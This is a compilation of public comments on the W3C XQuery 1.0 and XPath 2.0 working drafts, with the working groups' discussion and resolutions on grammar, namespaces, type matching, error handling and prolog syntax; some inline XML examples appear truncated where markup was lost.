(b) We can replace the example in Section 3.7.1.5 with the following ugly but correct example: <a xmlns:xs="http://www.w3.org/2001/XMLSchema" xsi:type="xs:integer">47</a> (along with an embarrassing explanation about why this is necessary and an apology to users). --Don Chamberlin
Rationale: you can declare the prefix/URI binding in the instance. Option B is preferred. Don will respond to himself.

(IBM-XQ-008) Section 3.5.1 (Value Comparisons): Value comparisons were intended to be transitive, but there is a case in which they are not. Suppose that A and C are values of type int (32 bits of precision) that differ in their low-order bit. Suppose that B is the value of type float (24 bits of precision) into which both A and C are converted by the rules for casting int to float. Then "A eq B" is true and "B eq C" is true, but "A eq C" is false. The language documents should state that the value comparison operators are transitive except in cases where precision is lost in type-casting of operands. --Don Chamberlin Don: the problem is that value comparisons are still not transitive due to precision problems during conversion. Michael R. has a counter proposal (to get rid of transitivity altogether). Don elaborates on the actual problem. ADOPTED. Don will respond by elaborating on the corner case.
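To make the corner case concrete, here is a small sketch of my own (the particular values are my choice: 2^24 and 2^24 + 1, which cast to the same xs:float because a float carries only 24 bits of significand):

    let $a := xs:int(16777217)   (: 2^24 + 1 :)
    let $c := xs:int(16777216)   (: 2^24 :)
    let $b := xs:float($a)       (: rounds to the same float value as xs:float($c) :)
    return ($a eq $b, $b eq $c, $a eq $c)   (: true, true, false :)

The first two comparisons promote the int operand to xs:float, where both values collapse to 16777216, while the third compares the ints exactly, so transitivity is lost.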
(IBM-XQ-006) Section 3.1.5 (Function Calls): This section states that a function does not inherit a focus (in other words, the context item, context position, and context length are initially undefined inside the body of a function). The section should also say something about the other parts of the static and dynamic context. Are these inherited from the module in which the function is defined (as opposed to the calling module)? Are there any consistency rules between the contexts of the defining and calling modules? For example, can they have different default collations or default namespaces? Must their current date/time and implicit timezones be consistent? Can a variable that is assigned a value in the calling module be seen inside a function body? Can a document that is in the available documents of the calling module be seen inside a function body? --Don Chamberlin
[[ Discussion from meeting 168 on 2004-02-18: Don: where does the context of a function call come from? From the declaration context or from the calling context? Dana: mentions that BEA also has sent a couple of comments on this issue. Michael R.: suggests removing this(?) (modules?) from the required features. Don doesn't think that modules are so badly broken that they need to be given up. Suggests putting this issue on the F2F agenda. ]]

(IBM-XQ-005) Section 2.6.3 (Full Axis Feature): The phrase "raises a static error" should be changed to "may raise a static error", to denote that an implementation may selectively implement some of the reverse axes of XPath even though it does not claim to support the Full Axis Feature. --Don Chamberlin Don: wishes to have a continuum between only downward axes and full axes. This could be resolved by changing a MAY to a MUST. MRys: agrees, and wants to generalize it to all optional features. Peter F is in favor, if unsupported axes still raise a static error. Massimo also wants to make sure of that. ADOPTED. Don C. will respond accordingly.

The XQuery document notes that the following element constructor fails with a validation error: <p xsi:3</p> This is an unpleasant surprise for users - and there is a simple solution. The specification already requires implementations to create a namespace node for each namespace used in an element or attribute name: A namespace node is created corresponding to each namespace declared in a namespace declaration attribute of this (or any enclosing) direct element constructor, each computed namespace within this (or any enclosing) computed element constructor, and the xml namespace. These namespace nodes use the same prefixes and URIs as the namespace declarations from which they are derived (the prefix becomes the name of the namespace node, and the URI becomes the string value of the namespace node). A namespace node is created corresponding to any namespace used in the name of the element or in the names of its attributes. However, a namespace node need not be created if there is already a namespace node for a given namespace URI on a given element. The string value of the created namespace node is the namespace URI of the element or attribute name. The name of the namespace node (which represents the namespace prefix) is implementation-dependent; it must not conflict with the name of any other namespace node for the same element. A similar rule should be added to create a namespace node for each namespace used in an instance of the xs:QName type.
Jonathan
Rationale: you can declare the prefix/URI binding in the instance.

XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.2.1 White Space Rules You should probably define what you mean by "white space", since it isn't defined in the EBNF. "White space is tolerated before the first token and after the last token." The word "tolerated" is odd here. Perhaps change to "allowed". At the end of the sentence, append "of a module". "White space is optional between terminals, except a few cases where white space is needed" You must specify which cases. Also, after "except", I think you need to insert "for" or "in". "to disambiguate the token." This is a misuse of the term "disambiguate" in its technical sense. Ambiguity (or the lack thereof) is a property of a grammar. Change "token" to "grammar".
------------------------------------
"Special white space notation is specified with the EBNF productions, when it is different from the default rules," It's not clear what the default rules are. I think they started at "White space is optional". I believe it would increase clarity if you created a "Whitespace: default" subsection, and put the "default rules" under it. "'ws: significant' means that white space is significant as value content." As I understand it, this has nothing to do with specifying where white space is allowed: you could replace every "ws: significant" with "ws: explicit" and the set of legal queries would be the same. Specifying what is "significant as value content" is out of place here. (For instance, whether boundary whitespace is significant is controlled by the xmlspace declaration.) I don't think the white space rules are precise enough to tell me whether white space is allowed/disallowed/required between two terminals that are derived from productions with different ws annotations (e.g., one "ws: explicit", one default).
------------------------------------
"For XQuery," Delete. "White space is not freely allowed in the non-computed Constructor productions, but is specified explicitly in the grammar ..." Change "non-computed" to "direct". This sentence is unnecessary, since the corresponding productions have the appropriate "ws" annotations. (It's a holdover from the days before "ws" annotations.) "The lexical states where white space must have explicit specification are as follows: ..." If you're talking about the states that have an explicit transition on white space (or on a symbol that can derive a whitespace character), then:
--- The use of "must" is inappropriate, since it's not the implementor's job to ensure that you specify these transitions.
--- Why is PROCESSING_INSTRUCTION included in the list?
--- Why is EXPR_COMMENT excluded?
If you're talking about something else, does it affect the interpretation of A.2.2? In either case, the sentence should probably be moved to A.2.2, or else deleted.
------------------------------------
"For other usage of white space," Other than what? Aren't all uses of white space covered by either "the default rules", "ws: explicit", or "ws: significant"? "one or more white space characters are required to separate 'words'." What constitutes "words"? "Zero or more white space characters may optionally be used" Given "zero or more", "optionally" is redundant. "around punctuation and non-word symbols." What constitutes "punctuation"? Or "non-word symbols"?
In sum, this paragraph is vague and unhelpful, and could probably be construed to conflict with other requirements. Either delete it or make it more precise and better related to the rest of the section. ------------------------------------ Presumably, white space is disallowed anywhere that this section doesn't say it *is* allowed. (If that's the case, it would probably be good to mention it.) In particular, it would appear that white space is disallowed *within* terminals (or at least, those that are derived from a production without a "ws" annotation). Normally, this is sensible, but it has some odd (and probably unintended) consequences: --- Because SchemaGlobalTypeName is a terminal, constructs such as type( schedule ) or type (schedule) are illegal. --- Because Pragma and MUExtension are terminals, the spaces that appear around "pragma" and "extension" in the spec's examples of these constructs are illegal. --- All four "ws: explicit" annotations in the "Named Terminals" section are redundant. There are various ways to deal with these cases, but I think the root of the problem is defining the allowed locations for white space in terms of "terminals" (or "tokens"), which I think is unnecessary. ------------------------------------------------------------------------ The spec is inconsistent: "white space" or "whitespace"? ------------------------------------------------------------------------ Also, the following sections: 2.6.5 Pragmas 2.6.6 Must-Understand Extensions 3.1.6 XQuery Comments A.1.1 Grammar Notes (grammar-note: comments) E Glossary (must understand) all refer to "ignorable whitespace", but this term is never defined. -Michael Dyck Proposal accepted.. Section 3.7.3.3 of the XQuery specification says that for document constructors, "No schema validation is performed on the constructed document." This seems inconsistent with implicit validation of elements. Consider the following element constructor. <person> { $that/name, $that/address, $that/shoesize } </person> If the person element is in the ISSD, this is validated. Now observe what happens if this element is placed in a document node. document { <person> { $that/name, $that/address, $that/shoesize } </person> } Under the current language definition, the <person> element would be validated by its own constructor, and an error would be raised if validation fails. Then the validated <person> element would be copied under a new document node and its type annotation would be changed to xdt:untyped. If element constructors are implicitly validated, users will expect elements in document nodes to be valid. Two possibilities seem reasonable: 1. Copy the content directly to the document node constructor, preserving the types of child elements. This is simpler, but does not enforce identity constraints. 2. Copy the content directly to the document node constructor, preserving the types of child elements, then apply identity constraints to the document. This adds complexity, but ensures that the resulting document is schema valid. The status quo does not seem reasonable. Jonathan Already resolved in prior meetings. > Status: This comment was identified at the F2F as being related to > the typed value decision. Agreed: this is actually a separate issue. Proposal: Copy the content directly to the document node constructor, preserving the types of child elements. This is simpler, but does not enforce identity constraints. There is no implicit validation for document nodes. Decided: The above proposal is adopted. 
The issue is resolved via this proposal. "2.6.6.1 XQuery Flagger" says: "If the XQuery Flagger is enabled, a static error [err:XQ0015] is raised if the query contains a must-understand extension." This implies that the XQuery Flagger must be available in the static context. Jonathan Andrew: This doesn't change behavior - it could be treated editorially. It simply asks for a way to record whether the flagger is on in the static context. Proposal: The default predefined value for the XQuery flagger and XQuery static flagger are set by the host environment in an implementation defined way. They may not be augmented by an implementation or in a query. They are available for both static analysis and dynamic evaluation (this is already true). Decided: The above proposal is adopted. The above issue is resolved via this proposal. Note: This is related to Jan0203, which is still open and was discussed in meeting 167. Forwarding Proposal: > 1. Is it a violation of the spec to put the xml declaration prolog in an > XQuery expression as the example in the original e-mail below ? Yes, it should be flagged as an illegal PI by the data model (because of). The Data model spec should make this explicit. > 2. If it is a violation of the spec, what should an XQuery parser do > when it sees it ? Adding such a PI to the data model should be flagged as an error. The Data model spec should make this explicit. > 3. Since the XQuery document constructor is defined as: <snip/> > So, is it a violation of the spec if I write the following XQuery > expression on an XQuery implementation that does not automatically add > the XML declaration to a document node ? > document > { > <?xml version='1.0'?> > <x> > My Query result > </x> > } Yes, only because the above is an illegal PI. Resolved. Prohibit this in the DM, and it will be reflected in the "constructor location". The following issue was identified during formal definition of SequenceType matching. Resolution of this issue is necessary to complete closure of Issue 559 (New Sequence Type needs to be fully implemented in Formal Semantics). Current status: 1. The XQuery type system is based on XML Schema. 2. Section 2.4.4.3 Matching an ElementTest and an Element Node, point 2 states that: a. element(ElementName, TypeName) matches a given element node if the name of the element node matches ElementName or matches the name of an element in a substitution group headed by an element with the name ElementName [if such a head element exists] b. type-matches(TypeName, AT) is true, where AT is the type of the given element node. 3. To express a sequence type in the XQuery type system, it should correspond to some valid XML Schema structure. In XML Schema terminology, the sequence type syntax element(ElementName,TypeName) represents a new local element ElementName in the substitution group of a global element with the *same* ElementName, and with type TypeName. In XML Schema, you might express this sequence type as: <xs:element Problem 1: XML Schema requires that all members of a substitution group be globally declared, therefore the above XML Schema type is invalid and thus there is no valid XQuery type expression that represents the sequence type element(ElementName, TypeName). Problem 2: Even if we permitted such a type in the XQuery type system, another problem arises. XML Schema (and hence the XQuery type system) requires the type name of a substitution group member to be derived from the type name of the head of the substitution group. 
This constraint is not enforced by sequence-type matching, and therefore it is out of the scope of XML Schema and our type system. Because the current semantics of element(ElementName, TypeName) cannot be expressed in the XQuery type system, any example based on it is potentially unsound. To illustrate, consider the following XML Schema structures. An element person of type Person:

    define element person of type Person
    define type Person { element manager of type xs:string, }

A type Company:

    define type Company { element ticker of type xs:string }

and consider the sequence type: element(person, Company) There is no corresponding XML Schema or XQuery type for this sequence type, i.e., the following is invalid, because type Company is _not_ derived from type Person: <xs:element Consequence: we do not know how to map this sequence type into the XQuery type system and therefore cannot provide a static semantics for it. Possible solution 1: enforce the XML Schema's type-derivation constraint. Possible solution 2: treat element(person,Company) as the following local XML Schema element: <xs:element which is simple, but excludes substitution groups from the semantics. -- Mary Fernandez <mff@research.att.com> AT&T Labs - Research

RESOLVED by July WD changes, and internal FS.

In Section 3.2 on Path Expressions, the XQuery draft says (twice): "At evaluation time, if the root node above the context node is not a document node, a dynamic error is raised.[err:XP0050]" Error XP0050 has to do with the treat expression, so I don't think this is the right error number. Thanks, Priscilla Walmsley

We believe that this is the correct error to raise. Jerome will respond to this comment. Don: This error occurs when you do $x treat as document, or when you do // (which expands to include "treat as"). Resolution is to explain that. Jerome will respond.

L.S., Can the implementation of a computed element constructor freely choose the order of the attribute nodes? For example, is the result of element { "a" } { attribute { "b" } { "" }, attribute { "c" } { "" } } always <a b="" c=""/> or can it also be <a c="" b=""/> ? I would expect the latter for fundamental (attributes are essentially unordered) and practical reasons (letting the implementation choose a certain ordering may sometimes make certain operations more efficient), but it's not clear to me what the informal and formal semantics exactly have to say about this. I already raised a related point before (the document order of the contents of an element created with a computed element constructor seems underspecified) but am not sure about the follow-up, so if this has already been discussed I apologize. -- Jan Hidders

Andrew: This is covered by the DM spec, 2.4 Document Order, numbered item 4. Don: We should answer with the DM reference.

This is a badly lacking feature in XQuery: AFAIK, there is no way to recover/catch a dynamic error after it happens.
Actually, at least two kinds of dynamic errors should be distinguished: fatal / non-fatal, or non-recoverable / recoverable (XSLT2 has this distinction). Clearly there is a semantic difference between: 1) a wrong regular expression: this is a programming error, there is no real point in recovering from it; 2) trying to parse a document is an environment-dependent operation that may fail for unpredictable reasons: there is definitely a need to recover from such an error. Two possible solutions: 1) introduce an error catching mechanism -- in my implementation (Qizx/open) I have simply added a catch-error() function, but a more sophisticated mechanism (try/catch) would probably be better; 2) at the very least, consider modifying some functions like doc() so that they return a conventional value (e.g. the empty sequence) instead of raising an error.

2. File exists. RESOLUTION: rejected, closed

PC: Can we close with the comment that error handling will be a v2 feature? MH: Error handling is very important for our customers. MRys: You can add "must-understand" extensions. PC: It's a trade-off between time and functionality. MHK: It's complex, let's leave it till the next version. Close with negative decision. Jonathan will respond to Xavier. Dissenting vote from MH of Mark Logic. Xavier's second comment is related to Liam's comment below. Process with Liam's comment on the F&O agenda.

Status: We discussed this matter at the F2F under: > 19. Request for function fn:validatesCorrectly > qt-2004Feb1001-01 and decided not to add either the proposed function or general error handling. At meeting 173 Andrew proposed that a minimal try/otherwise construct be considered. Andrew has now informed me that IBM does NOT want to go this direction. I therefore propose that we resolve this comment based on the F2F decision, i.e. no try/catch functionality until V2. Related comments: [QT] CER-05 Catching dynamic errors, Mary Holstege

Hi Folks, [If this has already been answered, or this is not the appropriate venue for the question then please direct me to the appropriate place.] In the latest XPath 2.0 spec it defines a quantified expression as follows:

    QuantifiedExpr ::= (("some" "$") | ("every" "$")) VarName "in" ExprSingle ("," "$" VarName "in" ExprSingle)* "satisfies" ExprSingle

And ExprSingle is defined as follows:

    ExprSingle ::= ForExpr | QuantifiedExpr | IfExpr | OrExpr

I do not believe that this is correct. Here is one of the examples that is given in the discussion on quantified expressions: every $part in //part satisfies $part/@discounted The satisfies expression in the example is: $part/@discounted Clearly, it is neither a ForExpr, a QuantifiedExpr, an IfExpr, nor an OrExpr. In fact, wherever ExprSingle appears in the quantified expression it makes no sense. Can someone provide the correct BNF for the quantified expression? /Roger

I think you want to bind ors inside the satisfies clause. I agree with Scott that the current grammar seems to give the right precedence... A PathExpr is also an ExprSingle. Best regards Michael

To try and amplify Scott's response, note that OrExpr is an expression that *might* contain an "or" operator, not an expression that *must* contain an "or" operator.
To simplify the grammar, when you have a series of rules such as:

    OrExpr    ::= AndExpr ("or" AndExpr)*
    AndExpr   ::= ArithExpr ("and" ArithExpr)*
    ArithExpr ::= PathExpr (("+"|"-") PathExpr)*

then every PathExpr is an ArithExpr, and every ArithExpr is an AndExpr, and every AndExpr is an OrExpr, and therefore you can use a PathExpr everywhere an OrExpr is allowed, which means you can use it in the "satisfies" clause of a quantified expression. Michael Kay

Hi, I was surprised when I looked in the XQuery specification for a media type definition, but couldn't find one. I believe XQuery should have its own. FWIW, there's a TAG finding that seems to recommend it too; "W3C Working Groups engaged in defining a language SHOULD arrange for the registration of an Internet Media Type (defined in RFC 2046 [RFC2046]) for that language" -- Thanks! Mark. -- Mark Baker. Ottawa, Ontario, CANADA.

We now have an appendix about application/xquery. RESOLVED: qt-2004Jan0379-01 closed Liam will reply (see ACTION A-216-09 above) [done]

There seems to be a missing S between PITarget and Char* in the rule for XmlPI in the spec: Current rule: XmlPI ::= "<?" PITarget Char* "?>" Should be: XmlPI ::= "<?" PITarget (S Char*)? "?>" -scott

Hi Scott. Your last call comment in [1] has been given the ID qt-2004Jan0360-01. This is the official response from the XQuery and XSLT working groups. Your issue pertaining to the error in the XmlPI has been accepted, and the WGs have approved the fix you suggested. The production will read: [110] XmlPI ::= "<?" PITarget (S Char*)? "?>" /* ws: explicit */ (Since I am writing this to myself, this mail should also provide the confirmation that this fix is satisfactory!) -Scott Boag [1]

SB said he believes this item should be closed. DECIDED: to confirm the decision to follow the XML syntax for XmlPI slavishly. RESOLVED: qt-2004Jan0360-01 has been resolved by our decision to follow the XML syntax for PIs.

I am raising this comment because I have seen several XQuery users make mistakes as a result of the syntactic inconsistency between global variable declarations and local variables, and there seems to be no good reason why they are so different. For global variables we write: declare variable $x [as xs:integer] {3}; while for local variables we write: let $x [as xs:integer] := 3 I suggest changing the global variable syntax to: declare variable $x [as xs:integer] := 3; An external variable would be: declare variable $x [as xs:integer] external; Michael Kay ([XQuery] Inconsistent syntax for variable declarations) Approved

In section A.2.2 Lexical Rules, "<!--", "<?" and "<![CDATA[" go to XML_COMMENT, PROCESSING_INSTRUCTION, and CDATA_SECTION respectively with pushState(). The direct element constructor "<" goes to START_TAG with pushState(OPERATOR). Since the OPERATOR state is not pushed for comments, PIs, and CDATA sections, the following is illegal: let $a := <!-- foo --> return $a whereas let $a := (<!-- foo -->) behaves correctly. We suggest changing "<!--", "<?", and "<![CDATA[" to push the OPERATOR state so the parentheses are not necessary. --Sarah Response Given:

XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.2.2 Lexical Rules Some of the lexical states have incorrect transitions, causing the lexer to reject valid queries.
Specifically: ------------------------------------------------------------------------ Query: <!---- blah ----> | e Query: <?PITarget ?> | e Query: <![CDATA[x]]> | e Problem: In each case, after the ">", the lexer is in DEFAULT, which doesn't recognize "|" (or any other operator). Fix: In DEFAULT, for the transitions on "<!----", "<?", and "<![CDATA[", change "pushState()" to "pushState(OPERATOR)". Note: I reported this on November 28, 2002 (three versions ago), in ------------------------------------------------------------------------ Query: <Q> { typeswitch (e) case e return e default return e } </Q> Problem: After the "}", the lexer is in OPERATOR, which doesn't recognize "</". Fix: In DEFAULT, the transition for <"typeswitch" "("> should not involve "pushState(OPERATOR)". ------------------------------------------------------------------------ Query: processing-instruction {x} {x} Problem: Accepting the last "}" causes popState() on an empty stack. Fix: In OPERATOR, the transition for "{" needs "pushState()". ------------------------------------------------------------------------ Query: declare variable $x as processing-instruction()? external; e Problem: After the ")", the lexer is in OPERATOR, which doesn't recognize "?". Fix: In ITEMTYPE, the transition for <"processing-instruction" "("> should change "pushState(OPERATOR)" to "pushState(OCCURRENCEINDICATOR)". ------------------------------------------------------------------------ Query: declare variable $x external; e Query: declare function Q() external; e Problem: These leave DEFAULT on the stack. It's not clear whether this means that the lexer should reject them, but even if not, it's still bad form: a lexer with a maximum stack size would be much more likely to hit its limit. Fix: In DEFAULT, for the transitions on <"declare" "variable" "$"> and <"declare" "function">, don't "pushState(DEFAULT)". ------------------------------------------------------------------------ -Michael Dyck Response Given: XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.2.2 Lexical Rules Many states have transitions on patterns that aren't valid for that state. That is, for a query to put the lexer in the given state with the remaining input matching the given pattern, the query would have to have a syntax error. By accepting the erroneous pattern, the lexer delays detection of the syntax error. Specifically, I believe the following patterns are erroneous in the given states. DEFAULT "]" "," "[" OPERATOR <"declare"_"function"> <"at"_StringLiteral> "global" "(" <"validate"_"{"> <"typeswitch"_"("> <"declare"_"default"_"collation"> <"import"_"schema"> <"import"_"module"> <"declare"_"default"_"element"> <"declare"_"default"_"function"> <"declare"_"namespace"> <"declare"_"base-uri"> <"declare"_"xmlspace"> <"some"_"$"> <"every"_"$"> IntegerLiteral DecimalLiteral DoubleLiteral QName <NCName_":"_"*"> <"*"_":"_NCName> "." ".." NAMESPACEKEYWORD <"at"_StringLiteral> <"declare"_"default"_"element"> <"declare"_"default"_"function"> KINDTEST "@" StringLiteral SCHEMACONTEXTSTEP "@" START_TAG "{" END_TAG "{" -Michael Dyck Response Given: XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.2.2 Lexical Rules In some of the states, there are conflicts between some of the patterns, i.e. cases in which the input could match more than one pattern. Specifically: OPERATOR: conflict between QName and all the single-keyword patterns (e.g., "external", "skip", "default"). 
(Luckily, this appears to have an easy fix: simply delete QName from the state: I don't think it's valid here.) KINDTEST: conflict between QName and the keywords "context" & "global". EXPR_COMMENT: conflict between ExprCommentContent, PragmaContents, and ExtensionContents. (Fix: They're all defined to be Char, so you could just replace them with Char in the EBNF and here.) EXT_KEY: conflict between QName and the keywords "pragma" & "extension". -Michael Dyck Response Given: I posted a comment to the XQuery WG last year that was moved to become a last call. The mail is located at I was asked to forward it to the public list, so here is the content of the mail for public archiving and replies: This mail proposes an improvement to the query prolog syntax to address the ordering issues that several of my implementers have raised and that I have reported previously. Currently the grammar allows a function declaration before the default collation declaration, and a schema import can syntactically occur after a function declaration that refers to the type name imported. Since this arbitrary ordering complicates the prolog processing and the specification of such, we would like to propose a certain order in the prolog. We first have the version, then a group of context setters, then a group of namespace declarations and imports and then the variable and function declarations. I propose two syntactic varieties that distinguish for variable and function declarations and present the choice between two semantic varieties for the variable reference case. Note that I assume that we continue to allow a function declaration to refer to a function that is syntactically declared later at the same module level. Syntax A: ========= Prolog ::= (Version Separator)? (Setter Separator)* (Decl Separator)* (VarDecl Separator)* (Function Syntax B: ========= Prolog ::= (Version Separator)? (Setter Separator)* (Decl Separator)* (VF VFDecl ::= VarDecl | FunctionDecl Semantic Interpretation I: -------------------------- Example 1: declare variable $a as xs:integer { $b + 42 } declare variable $b as xs:integer { 0 } Example 2 (only for Syntax B): declare function foo($x as xs:integer) as xs:integer { $x + $const } declare variable $const as xs:integer Both examples work without error. Semantic Interpretation II: --------------------------- Neither of the two examples works. The declaration of $a in Example 1 would raise an error about not having $b declared yet, and the function body in example 2 would raise an error that the $const has not been declared yet. Which would you prefer? A.I., A.II., B.I., or B.II? We have a slight preference of A over B and interpretation II over I, but can live with the others. Best regards Michael Response Given: Section 3.1.1 Literals Technical XQuery String literal should not recognize any entities as part of the human-readable syntax. Requiring support will make parsing and user-understanding of strings like "H&M" way too complex. Resolved, this is rejected. DonC: There are use cases for this in the language document, e.g. Euro character. MRys: No, that depends on input tool. Q: DonC's example is a character reference; comment only speaks to entities. A: Believe that is an oversight. Dana: Don't believe we should distinguish this from character reference issue. Limits XQuery to devices where you can enter Unicode, which I don't think this is a good idea. If we support character reference resolving, suggest we support both. 
Don: Worried about cases where content of string contains both kinds of string. Don't I need character references for one of them? A: No, can double them. MH: Agree Dana. MKay: Something to be said for proposal, but uneasy about it. In part because we don't say, for example, that query is Unicode. Say nothing about encoding. Have to take them both entity and character references together. Don't get benefit of writing freestanding ampersand unless you get rid of both or use context-dependent parsing or escaping mechanism. But would be happier handling Unicode problem through context-free preparse of string the way Java does. No support for the proposal. We have no statement about what encoding queries are in, and if encoding is not Unicode, we need a way to ensure that regardless of the context there should be a way to input the Unicode characters. Given you need & for the character references anyway, seems appropriate to have the same rules as in literal element content and have the predefined entities as well. DonC to respond. We decline to make the change. Sections 2.6.6.1/2.6.7.1 Technical Why are the Flaggers mandated when providing extensions? This is basically a parser option and should be left to the implementation. I can always run somebody else's query that contains pragma since I can ignore them (as can other implementations) and other implementations will always flag extensions anyway. This seems to make the flagger only an implementation nuisance. Flagger are no longer mandated, solved by removing flaggers. Section 2.6.5/6 Technical Please add a specification of the scoping of the pragma/extension (implementation-defined? Within a FOR?). We would prefer to have the scoping implementation-defined on a per pragma/extension basis. MR: the new scoping of the syntax makes it much clearer. Sections 2.6.5/6 Technical Do not mandate the QName in a pragma/extension, but allow it (make pragma content+). Do not require it to be a unique identifier. For example, I may want to use the same pragma QName for all my pragmas to indicate the product and use sub content to indicate other information. MR: the new method makes more sense. Sections 2.6.5/6 Technical Provide static contexts for pragma/extension information MR: now we have options I think it's clearer PC, LQ, MH: they're implementation defined, so we don't need to say this [the impl'n can do what it wants with the options, including this] Section 2.6.3 Full Axis Feature Editorial Please reword: "(however, XQuery does not recognize the namespace axis defined by XPath)." to "Note: XQuery does not recognize the namespace axis defined by XPath 2.0." DECISION: To leave to the editor, who advised us that he rejects the proposed change RESOLVED: qt-2004Jan0200-01 closed, rejected editorially Section. --RESOLUTION. Closed. No action required. Overtaken by events. Section 2.5. Error Handling Technical Please add a sentence of the form "If an implementation can determine during analysis phase that an expression is always raising a dynamic or type error (if static typing option is not used), that error can be reported during the analysis phase". DonC: Text exists in 2.5.1 "Kinds of Errors" MKay: Text as quoted is not sufficient; doesn't cover cases where you can just infer error. DonC: We considered that and issue of what if this was in an else branch; if you don't know it is executed you don't want to raise the error. We therefore came to the existing working. 
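DonC's point about untaken branches can be made concrete with a small sketch (the $useDefault variable and the values are invented for illustration):

    if ($useDefault) then 0 else "three" + 1

    (: The else branch would always raise a type error if it were evaluated,
       but it may never be evaluated, which is why reporting such errors during
       the analysis phase is permitted but not required. :)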
Amended: "If an implementation can determine during analysis phase that an expression is always raising a type error (if static typing option is not used), that error can be reported during the analysis phase" Adopted. DonC to respond. Section 2.4.2 Typed Value and String Value Technical "If the type annotation denotes a complex type with element-only content, then the typed value of the node is undefined.": The data model already makes this case an error. Please align the specs. WG believes specs are aligned. First sentence is simply an explanation of why data model would return error for dm:typed-value, which reflected at language level by call to fn:data raising a type error. No change. ACTION: DonC will send response. Section 2.4.2 Typed Value and String Value Editorial/Technical Remove references to "namespace nodes" since they are not exposed in XQuery. Subsumed by qt-2004Feb0207-01 >> Don has no problem making the change in this section, but will be references to namespaces nodes in many other places in the document. >> Michael Kay: the statement as written is true, but doesn't hurt to remove it here, as is defined in the data model anyway. >> This section doesn't talk about getting the value of a namespace node, just asserts that it has one. >> Michael R: his comment was only on this specific part of the document, and doesn't make sense to talk about getting the string value of something we can't reach. >> Don: This section just recapitulates what the DM says. >> Paul: DM section 5.5, last call Nov 5. Link takes him to E.5. >> Michael: in XQuery, is on way to get the value of a namespace node, because we can't get access to the node. >> But in XPath we can. But since this is an XQuery document, we shouldn't refer to things you can't reach. >> Don: We could name namespace XPath only in this paragraph... >> I'm neutral. >> Anyone disagree or can't live with Michael's change? >> Paul: instead, add a note that indicates that because ns axis is not accessible in XQuery... >> Don: would make it a rule not a note. >> ACCEPTED, but instead of the proposal, we will add text to XQuery to explain the non-accessiblity of namespace ndoes. Don to make the change and reply to the public comment. Section 2.4.1 Predefined Types Technical "xdt:untypedAny is .." See problem raised in MS-DM-LC2-038 (see ). xdt:untypedAny should only cover the untyped not and skip validated cases. Already resolved in prior meetings. Section 2.2.5 Consistency Constraints Editorial/Technical "For every data model node that has a type annotation other than xs:anyType" add both untyped types or just assume that all types are always in the ISSD (xs:anyType, xdt:untyped etc) and do not special case these types. This has been fixed in the document XQuery currently lacks a mechanism to return metadata describing the persistent objects of interest to its users. While this capability could be added to each of the APIs that are designed for XQuery, we suggest that it would be better for XQuery to provide this metadata. SQL defines the Information Schema tables that reflect its metadata. While these tables were provided in SQL-92, they have not been widely implemented. By the time that they were published, vendors had already started defining their own tables and API methods to make this type of information available. XQuery users can make reference to a number of objects in their queries. The following table shows each of these objects and describes which constructs allow their use. 
    XQuery object    clause that allows the use of this object
    schema           Schema Import in prolog
    module           Module Import in prolog
    collation        Default Collation Declaration in prolog,
                     OrderModifier in OrderBy Clause,
                     functions such as fn:contains
    collection       fn:collection
    document         fn:doc

XQuery metadata might be provided by a function, fn:metadata. This function would return the descriptions of schemas, modules, collations, collections, and documents that are accessible to the issuer of the query. A schema would be provided to describe the document or element produced by this function. Implementations could provide additional metadata by extending the types defined by this schema. An application might request the entire metadata document, or it might operate on it with XQuery to return only part of this metadata. We recognize that some XQuery implementations are "closed world", with all objects of these types registered in a repository of some sort, while others are "open world", attempting to resolve URIs across the world wide web. We suggest that the objects described by fn:metadata be defined to return a subset, possibly an empty subset, of the objects that can be used in a query. An open world implementation might return no object descriptions at all. A user might issue the following query: for $c in fn:metadata()//xqm:collection return fn:data($c/xqm:collection-uri) This query might return the following: . . . -- Andrew Eisenberg, IBM, andrew.eisenberg@us.ibm.com

Metadata is difficult. Jim: it's needed for just about any query that's going to be generated dynamically. We learned that the hard way with static SQL. If we don't provide it in XQuery, a lot of designers of the environments in which it's used will have to provide it. JR: what are the use cases? Andrew: IBM thinks it's necessary. We have a number of statements, e.g. import schemas, documents, open collections, and there's no way to discover those. MR: SQL 1 didn't have this. Liam: we would need liaison with external groups, e.g. the RDF WG, and that could take a long time. Jim: I don't think it would be that hard to come up with a small set of metadata that we believe is urgently required. By the time we got to SQL 92, vendors had all invented incompatible mechanisms. JR: a lot of queries that need metadata in SQL, you can get them through element and attribute names in XQuery. We've taken a bunch of use cases in this area and solved them. The functionality is important and should be done right. Andrew: Imagine you're in a GUI writing a query, you want a pull-down list of available schemas and modules. PaulC: I hear Oracle and IBM saying V1; Michael and Data Direct and Liam say not in V1; I haven't heard Mary. Mary: also not in V2, there are parts of this proposal that would be [hard or impossible to implement], I'm sympathetic to the proposal but I want to sit down and discuss it. PaulC: not enough consensus for V1, so we have to reject the comment in order to meet our schedule. Jim: in the XSLT world there's EXSLT; those of us interested in doing something like this would like an efn by analogy.

Section 2.2.3.2 Dynamic Analysis Phase Editorial/Technical is too strong. If I know for sure that I always will have a dynamic type error (e.g., the expected type is xs:string and the passed value is always an instance of xs:int), I should be able to raise this type error during the static phase even if the static typing feature is not employed.
[implementations] are allowed to detect errors early, so why should the implementation be forced to go through the dynamic evaluation phase? The problem is "must proceed with the dynamic evaluation phase". Replacing "must" with "may" is the intent. Principles: 1. If you raise a type-related warning, you do not need to proceed with dynamic eval phase. 2. If you do proceed with dynamic evaluation phase after type-related warnings have been raised, you need to raise type-related errors. ACCEPTED, Don to make the change and reply to the public comment. Section 2.2.3.1 Static Analysis Phase Technical "During the static analysis phase, if the Static Typing Feature is in effect and the static type assigned to an expression other than () is empty, a static error is raised.": We also need to exempt fn:data(()) which is used by atomization since we atomize () in an expression such as foo(()). >> Paul: Is making sure the sentence is exactly correct. >> Don: already done. >> ACCEPTED, Don to reply to the public comment. Section 2.1.1 Static Context Editorial How does module import affect the static context items? subsumed under f2f 13A: > a) Consistency rules for static context components, Don C > (1) delete the sentence from C.1 --> adopted (2) three new cases a) binding to the same namespace prefix more than once --> adopted, a static error b) user tries to bind the same variable name more than once --> withdrawn, see discussion below, with clarifications as listed below c) xmlspace declared more than once in the prolog --> adopted, a static error Discussion of (b) by examples: 1: for $i in $this, $i in $that return $i 2: for $i in $this, $i in that($i) return $i 